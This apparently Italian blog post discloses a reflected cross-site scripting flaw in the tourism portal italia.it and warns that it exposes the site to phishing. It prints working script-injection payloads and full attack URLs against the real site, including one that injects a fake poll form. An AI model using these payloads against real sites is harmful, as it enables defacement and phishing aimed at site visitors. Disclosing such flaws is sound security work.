Il nuovo portale italiano sul turismo italia.it fa un po’ acqua da tutte le parti inquanto a sicurezza.
Chi vuole un esempio, provi a sostituire il valore del parametro “scope” passato sulla URI del sito con:
"><script>alert('YaBaDaBaDoOoO');</script> <"input type="hidden" value="
cosi facendo si inserisce lo script nella:
<input type=...
http://www.italia.it/it/scout/text/5,it,SCH1,2005/objectId, RGN8it,modulId,scout,s,0,season,at1,selectedEntry, home/result.html?rgnCMP=RGN8it&scope="> <script>alert('YaBaDaBaDoOoO');< /script><input type="hidden" value="&Submit2.x=12&Submit2.y=10
Con piu’ fantasia, si puo’ aggiungere un sondaggio :)
http://www.italia.it/it/scout/text/5,it,SCH1,2005/objectId, RGN8it,modulId,scout,s,0,season,at1,selectedEntry, home/result.html?rgnCMP=RGN8it&scope= "><script>alert('YaBaDaBaDoOoO'); </script><br><br>Come sono stati spesi i soldi?<select><option>Male<option> Malissimo</select><input type="submit" value="Sei daccordo?" class="button"> <input type="hidden" value="&Submit2.x=12&Submit2.y=10
o meglio: http://tinyurl.com/2h49x8
In parole povere, possiamo piu’ o meno ridefinire il sito abbastanza a piacere. E questo e’ un grave problema di sicurezza ponendo il sito al centro dell’attenzione di chi fa del phishing
la sua professione.